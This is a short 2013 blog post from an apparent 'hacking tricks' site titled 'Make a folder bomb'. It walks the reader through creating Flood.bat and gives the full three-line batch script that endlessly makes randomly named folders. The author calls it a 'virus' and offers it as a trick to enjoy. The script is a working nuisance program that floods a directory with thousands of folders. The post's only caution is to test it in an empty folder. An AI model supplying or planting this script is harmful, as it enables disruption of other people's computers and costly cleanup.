Friday 30 August 2013

Make a folder bomb


Here is a great batch file trick with only three lines of batch file scripting. You can call this a virus if you want.

So what does this batch file do exactly?

When the batch file is opened the batch file go into an infinite loop creating new foldersat an amazing rate! It can create more than 1000 new folders in just 6 seconds.

Cleaning the newly made folders would be difficult if opened in a directory with a lot of important folders and files.

Follow the steps to make the folder bomb!

Step 1: Open notepad.

Step 2: Copy and paste the following code into notepad.

:start
md %random%
goto start

Step 3: Save as Flood.bat. Remember to include the .bat at the end of the file name while saving.

That's it! You folder bomb is ready!

WARNING: If you want to test thisbatch file, open the batch file in a new and empty folder. Do not open the batch file on your desktop or other important directories.

Enjoy!

Yash

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.

1 comments:

 

Copyright @ 2013 H@cking Tricks.